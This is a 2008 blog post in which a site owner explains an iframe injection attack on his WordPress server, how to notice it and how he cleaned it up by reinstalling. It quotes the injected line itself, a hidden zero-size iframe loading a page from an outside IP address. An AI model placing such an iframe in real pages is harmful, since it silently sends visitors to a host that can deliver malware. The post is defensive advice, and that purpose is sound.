Site Attacked - iframe Injection

  • Posted by Walkere on June 1st, 2008 filed in Random WoW

Recently, I was informed by a reader of another site I host on this server that it had been the victim of an iframe injection attack. A bit of code had been injected into the website, the main purpose of which is to add a bunch of links (made invisible by CSS) to the bottom of the page.

If you host your own WoW blog, or any site for that matter, you’ll want to keep a look out for these types of attacks. At best, it’ll damage your search engine rankings. At worst, they could be designed to redirect your users to another malicious site and provoke them to install malware.

What To Look For - How Do I Know I’ve Been Injected

If you don’t know what an iframe injection attack is, here’s what you want to look for.

Somewhere in the page (usually at the very end), a single line of html code will be inserted. It will look something like this.

<iframe src="http://124.217.252.62/~admin/count.php?o=5" width=0 height=0
  style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>

If you don’t regularly look through the html of your page (and really, why should you?), this can be hard to spot. In my case, I noticed a tell-tale sign that may help you identify a problem.

After the site loaded, the browser continued to signal that it was loading content. I thought that one of the ads was still being loaded from a remote location, but when I looked at the status bar I saw that it was loading from the ip address in the iframe code above.

If your site suddenly starts to hang and continue loading something after all of your content has appeared, that’s a good sign that something is wrong and you should check under the hood for this type of problem.

Omg! How Do I Fix This?

First, you’ll want to check out all of the other sites you host on the server. These are often server wide attacks. The hacker somehow gains access to the server and injects all or most of the files on it.

Basically, you can fix this by eliminating the code. Unfortunately, it may be spread throughout a lot of different files, and I couldn’t figure out which one was the culprit. It had been added to almost all of the index.php files in my Wordpress installation, and despite deleting several of these snippets the iframe kept loading.

Instead, I wiped Wordpress clean and re-installed it. I exported all of my posts/comments in the dashboard, just in case. I then saved all of the theme files and my plug-in files. I’ll go through these to make sure that the iframe isn’t in any of them.

Then, I uploaded a brand new Wordpress installation and went to the upgrade page. I needed to upgrade anyway, so it patched the database… and everything works like new.

You probably don’t need to re-install Wordpress (or your own blogging software) to eliminate this, but it may be the easiest method. Just make sure you back up the content first.

Good luck. Be safe.

Leave a Comment